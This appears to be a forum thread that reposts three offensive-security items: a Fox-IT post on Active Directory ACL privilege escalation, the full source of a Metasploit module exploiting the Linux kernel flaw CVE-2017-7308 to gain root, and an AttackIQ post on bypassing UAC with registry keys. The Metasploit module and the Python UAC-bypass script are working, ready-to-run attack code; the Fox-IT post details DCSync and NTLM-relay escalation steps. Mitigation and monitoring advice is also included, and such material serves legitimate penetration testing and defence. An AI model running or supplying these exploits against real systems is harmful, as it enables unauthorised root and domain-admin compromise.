During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack.
AD, ACLs and ACEs
As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kinds of scenarios. Often overlooked are the Access Control Lists (ACL) in AD. An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that, when configured correctly, all descendant objects will inherit the ACL. The ACL of the Organizational Unit (OU) wherein the objects reside contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied to the OU and/or descending objects. The identity that is specified in the ACE does not necessarily need to be the user account itself; it is a common practice to apply permissions to AD security groups. By adding the user account as a member of this security group, the user account is granted the permissions that are configured within the ACE, because the user is a member of that security group.
Group memberships within AD are applied recursively. Let's say that we have three groups:
Group_A
Group_B
Group_C
Group_C is a member of Group_B, which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, a printer or an AD object, such as a user, computer, group or even the domain itself. Providing permissions and access rights with AD security groups is a great way of maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too often. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions, as the short sketch below illustrates.
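As a minimal illustration of this recursive resolution, the following Python sketch flattens nested memberships. The group names are the ones from the example above; everything else is purely illustrative and not tied to any particular tool.

# Minimal sketch of recursive group membership resolution, using the example above.
group_members = {
    "Group_A": ["Group_B"],
    "Group_B": ["Group_C"],
    "Group_C": ["Bob"],
}

def effective_groups(principal):
    """Return every group the principal is a direct or indirect member of."""
    result, changed = set(), True
    while changed:
        changed = False
        for group, members in group_members.items():
            if group not in result and (principal in members or result & set(members)):
                result.add(group)
                changed = True
    return result

print(effective_groups("Bob"))   # {'Group_C', 'Group_B', 'Group_A'}
# If Group_A has, for example, writeDACL on the domain object, Bob effectively has it too.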
However, if the user is a direct member of only one group and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions.
Escalating privileges in AD with Exchange
During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provides access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is a member of the Exchange Windows Permissions security group. By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed.1 The writeDACL permission allows an identity to modify permissions on the designated object (in other words: modify the ACL), which means that by being a member of the Organization Management group we were able to escalate our privileges to those of a domain administrator.
To exploit this, we added the user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permissions group, which allowed us to modify the ACL of the domain.
If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allow them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right to change a password, send email to a mailbox and many more.2 It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:
Replicating Directory Changes
Replicating Directory Changes All
When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page: https://github.com/gdedrouas/Exchange-AD-Privesc
Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain. To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.
Invoke-ACLPwn
Invoke-ACLPwn is a PowerShell script that is designed to run with integrated credentials as well as with specified credentials.
The tool works by creating an export with SharpHound3 of all ACLs in the domain, as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permissions on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate, but could end up with a chain to obtain writeDACL permission on the domain object. When the chain has been calculated, the script will then start to exploit every step in the chain:
The user is added to the necessary groups.
Two ACEs are added to the ACL of the domain object: Replicating Directory Changes and Replicating Directory Changes All.
Optionally, Mimikatz' DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used.
After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object. The enumeration idea is sketched below.
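Conceptually, the enumeration is a breadth-first walk. The following Python sketch is an illustration only (it is not Invoke-ACLPwn's code, and the relationships below are a made-up example rather than SharpHound output): starting from the identities that hold ACEs on the domain object, it walks through group memberships and further ACEs until it reaches an account the attacker controls.

# Conceptual sketch of the chain enumeration described above (made-up data model).
from collections import deque

# object or group -> identities that appear in its ACL or can manage its membership
can_reach = {
    "DC=corp,DC=local":             ["Exchange Windows Permissions"],
    "Exchange Windows Permissions": ["Exchange Trusted Subsystem"],
    "Exchange Trusted Subsystem":   ["Organization Management"],
    "Organization Management":      ["testgroup_z"],
    "testgroup_z":                  ["testgroup_y"],
    "testgroup_y":                  ["bob"],
}

def find_chain(target_object, controlled_account):
    """Breadth-first search for a path from the target object back to our account."""
    queue = deque([[target_object]])
    while queue:
        path = queue.popleft()
        for identity in can_reach.get(path[-1], []):
            if identity == controlled_account:
                return path + [identity]
            if identity not in path:          # avoid cycles
                queue.append(path + [identity])
    return None

print(" <- ".join(find_chain("DC=corp,DC=local", "bob")))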
To test the script, we created 26 security groups. Every group was a member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z). The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory. We now had a chain of 31 links:
Indirect member of 26 security groups
Permission to modify the group membership of the Organization Management security group
Membership of the Organization Management group
Permission to modify the group membership of the Exchange Trusted Subsystem security group
Membership of the Exchange Trusted Subsystem and the Exchange Windows Permissions security groups
The result of the tool can be seen in the following screenshot:
Please note that in this example we used the ACL configuration that was configured during the installation of Exchange. However, the tool does not rely on Exchange or any other product to find and exploit a chain. Currently, only the writeDACL permission on the domain object is enumerated and exploited. There are other types of access rights, such as owner, writeOwner, genericAll, et cetera, that can be exploited on other objects as well. These access rights are explained in depth in this whitepaper by the BloodHound team. Updates to the tool that also exploit these privileges will be developed and released in the future. The Invoke-ACLPwn tool can be downloaded from our GitHub here: https://github.com/fox-it/Invoke-ACLPwn
NTLMRelayx
Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated. This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first attack is called the ACL attack, in which the ACL on the Domain object is modified and a user under the attacker's control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as described in the previous sections. If modifying the domain ACL is not possible, the access to add members to several high privilege groups in the domain is considered for a Group attack:
Enterprise Admins
Domain Admins
Backup Operators (who can back up critical files on the Domain Controller)
Account Operators (who have control over almost all groups in the domain)
If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an OrganizationalUnit for which control was delegated to, for example, IT department members.
One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example of such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker's machine, for example by using mitm6 for a network level attack, privileges can be instantly escalated to Domain Admin. The NTDS.dit hashes can now be dumped by using impacket's secretsdump.py or with Mimikatz.
Similarly, if an attacker has Administrative privileges on the Exchange Server, it is possible to escalate privileges in the domain without the need to dump any passwords or machine account hashes from the system. Connecting to the attacker from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-Webrequest being called with psexec.py, which will run from a SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic authentication with NTLM. The 404 error here is expected, as ntlmrelayx.py serves a 404 page if the relaying attack is complete.
It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel.
The only mitigation for this is enabling channel binding for LDAP in the registry. To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub: https://github.com/CoreSecurity/impacket
Recommendation
As for mitigation, Fox-IT has a few recommendations.
Remove dangerous ACLs: Check for dangerous ACLs with tools such as Bloodhound.3 Bloodhound can make an export of all ACLs in the domain, which helps identify dangerous ACLs.
Remove writeDACL permission for Exchange Enterprise Servers: Remove the writeDACL permission for Exchange Enterprise Servers. For more information see the following TechNet article: https://technet.microsoft.com/en-us/library/ee428169(v=exchg.80).aspx
Monitor security groups: Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions.
Audit and monitor changes to the ACL: Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found in the following TechNet article: https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/
When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:
Get-WinEvent -FilterHashtable @{logname='security'; id=5136}
This event contains the account name and the ACL in Security Descriptor Definition Language (SDDL) format. Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10, ConvertFrom-SDDL,4 which converts the SDDL string into a more readable ACL object. If the server runs Windows Server 2016 as its operating system, it is also possible to see the original and modified descriptors. For more information: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715
With this information you should be able to start an investigation to discover what was modified, when that happened and the reason behind it.
References
[1] https://technet.microsoft.com/en-us/library/ee681663.aspx
[2] https://technet.microsoft.com/en-us/library/ff405676.aspx
[3] https://github.com/BloodHoundAD/SharpHound
[4] https://docs.microsoft.com/en-us/powershell/module/Microsoft.powershell.utility/convertfrom-sddlstring
Sursa: https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
  24. AF_PACKET packet_set_ring Privilege Escalation Posted May 17, 2018 Authored by Brendan Coles, Andrey Konovalov | Site metasploit.com This Metasploit module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This Metasploit module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation', 'Description' => %q{ This module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Andrey Konovalov', # Discovery and C exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Mar 29 2017', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'EDB', '41994' ], [ 'CVE', '2017-7308' ], [ 'BID', '97234' ], [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ], [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ], [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ], [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ], [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." write_file path, data end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/ vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" cores = get_cpu_info[:cores].to_i min_required_cores = 2 unless cores >= min_required_cores vprint_error "System has less than #{min_required_cores} CPU cores" return CheckCode::Safe end vprint_good "System has #{cores} CPU cores" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' if kptr_restrict? && dmesg_restrict? vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.' return CheckCode::Safe end CheckCode::Appears end def exploit if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 
'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile executable_path, exploit_data('poc.c') rm_f "#{executable_path}.c" else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('exploit') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit...' output = cmd_exec "#{executable_path} #{payload_path}" output.each_line { |line| vprint_status line.chomp } print_status 'Deleting executable...' rm_f executable_path Rex.sleep 5 print_status 'Deleting payload...' rm_f payload_path end end Sursa: https://packetstormsecurity.com/files/147685
  25. Bypassing UAC using Registry Keys
Category: Blog
Welcome to the first of a new series of blogs we'll be publishing with information about the scenarios we write for our platform. Our intention is to provide information about security threats with enough technical data to satisfy those of you who are curious and want to understand the inner workings of the threat techniques we implement. This series of posts is not meant to showcase the latest and greatest of our creations, just some details about popular scenarios in our library that we think might be of some interest to the people out there. Some of these will be kept high level and in others we will go into greater technical detail. We'll always try to be as clear as possible on how we implement our philosophy "Think Bad, Do Good" by creating techniques that mimic the same TTPs followed by threat actors while keeping things safe for our customers. Without more delay, welcome to the first post in this series.
User Account Control (UAC) is a Windows feature that helps to prevent unauthorized changes to the system. This blog will show how a threat actor can silently execute privileged actions that modify the system while bypassing this security control. UAC has been present since Windows Vista and Windows Server 2008 with the goal of making the user aware when relevant system changes are triggered. It works by showing a popup window which asks for user interaction in order to accept some requested system changes, specifying the program name and publisher that are trying to carry out these changes. Also, the rest of the screen is usually dimmed to make users more aware that this popup is really important, so they should pay attention. This feature is very helpful to users so they can discern the relevance of the system changes that they perform, but it can also be helpful in detecting when another application or malware is trying to modify the system. Bypassing UAC is a well-known attack technique, categorized under the Defense Evasion and Privilege Escalation techniques on the MITRE ATT&CK matrix.
Technical details
Since UAC is a security measure that can prevent malware, unwanted users or applications from changing relevant system configurations, threat actors are always looking for new ways to bypass UAC with the goal of performing privileged system changes without alerting the legitimate user. Different methods to bypass UAC exist, but this blog post is focused on registry modification techniques. The chosen technique relies on modifying the registry key for a specific system utility application whose privileges are auto-elevated by design and which has the ability to execute other applications and give them privileges. Three parameters are necessary to execute this technique. Two of them are directly related to the bypass technique, and the last one is the target command to execute with privileges while bypassing UAC:
Privileged application that will trigger the target application
Registry key read by this privileged application, whose content should be the path of a binary that will be executed
Program path of the binary that will be silently executed by using the UAC bypass technique
For example, the UAC bypass technique that we will explain for Windows 7 takes advantage of the eventvwr.exe application. This privileged application works like a shortcut to the Microsoft Management Console (MMC). When eventvwr.exe starts, it will check if a specific binary is used to provide the functionality of the MMC snap-in for the event viewer.
To do that it looks for the specific binary location at the registry key "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command". Then it executes the binary at this path if it exists; otherwise the default MMC snap-in for the Windows event viewer will be loaded. The content of this registry key is what can be used to execute binaries while bypassing UAC. Due to Windows updates and security fixes, the privileged application and the registry key can be different for distinct Windows versions. Since there is no bypass technique that shares the same privileged application and registry key at the time of this writing, we will show parameters that are valid for Windows 7. Other parameters are valid for Windows 10. Now, let's demonstrate how these techniques work, one at a time.
The Windows 7 technique is based on the following parameters:
Auto-elevated privileged application: eventvwr.exe
Registry key with path to execute: HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
To replicate this technique, the first step is to modify the registry key with the target application to execute. In this case we have chosen "C:\Windows\System32\cmd.exe". Now that the registry key has been set, executing the eventvwr.exe process will execute the content of this registry key instead of loading itself. Finally, it is possible to check that the newly spawned process is running with High Integrity, which allows it to access several privileged and protected system resources.
The Windows 10 technique has the same parameter types, but with different values:
Auto-elevated privileged application: sdclt.exe
Registry key with path to execute: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
The first step is to modify the registry key as in the previous technique. We have chosen "C:\Windows\System32\cmd.exe" as the target application again. Once the registry key has been set, the next step is to execute "sdclt.exe". This process will start the command line application instead of loading itself, which is the same behaviour seen in the Windows 7 technique. Finally, we can check that the integrity level of the newly spawned process is High, just as expected.
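Putting the steps above into a script is straightforward. The following is a minimal Python sketch (an assumption for illustration: Python available on the target, lab use only) of the Windows 7 variant using the standard winreg module; the Windows 10 variant only swaps the registry key and the auto-elevated binary (sdclt.exe). The payload is the same cmd.exe placeholder used in the post.

# Minimal sketch of the Windows 7 variant described above: plant a payload path in
# HKCU\Software\Classes\mscfile\shell\open\command and let eventvwr.exe execute it.
import subprocess
import winreg

KEY_PATH = r"Software\Classes\mscfile\shell\open\command"
PAYLOAD = r"C:\Windows\System32\cmd.exe"   # target binary, as in the blog post

# 1. Set the payload path as the default value of the key (creating it if needed)
key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, KEY_PATH)
winreg.SetValueEx(key, "", 0, winreg.REG_SZ, PAYLOAD)
winreg.CloseKey(key)

# 2. Trigger the auto-elevated binary; it reads the key and spawns the payload
#    with high integrity instead of loading the default MMC snap-in.
subprocess.run("eventvwr.exe")

# 3. Remove the planted key (cleaning up the rest of the mscfile branch is omitted)
winreg.DeleteKey(winreg.HKEY_CURRENT_USER, KEY_PATH)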
Our research team is working on writing scenarios that are capable of testing whether there are security controls preventing this kind of attack, in addition to many other attacks used by threat actors. This is achieved by using AttackIQ scenarios which can be very specific, such as this one, or as generic as needed to modify user-provided registry keys. With these generic scenarios everybody is able to test any kind of attack based on registry modifications. There are also many other generic scenarios, such as executing system commands, modifying files, exfiltrating files, discovering network assets, using different persistence techniques, etc.
Mitigations
Since both techniques rely on the same principle, the mitigation for them is also the same. It is as simple as setting the UAC level to Always Notify. A different protection approach can be used for those environments where it is not desirable to set the UAC level to Always Notify (however, having a different level is not recommended from the system's security perspective). This approach consists in monitoring and preventing registry changes on the following registry keys:
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
Along with these mitigations, it is also recommended to use unprivileged accounts whenever possible.
Sursa: https://attackiq.com/blog/2018/05/14/bypassing-uac-using-registry-keys/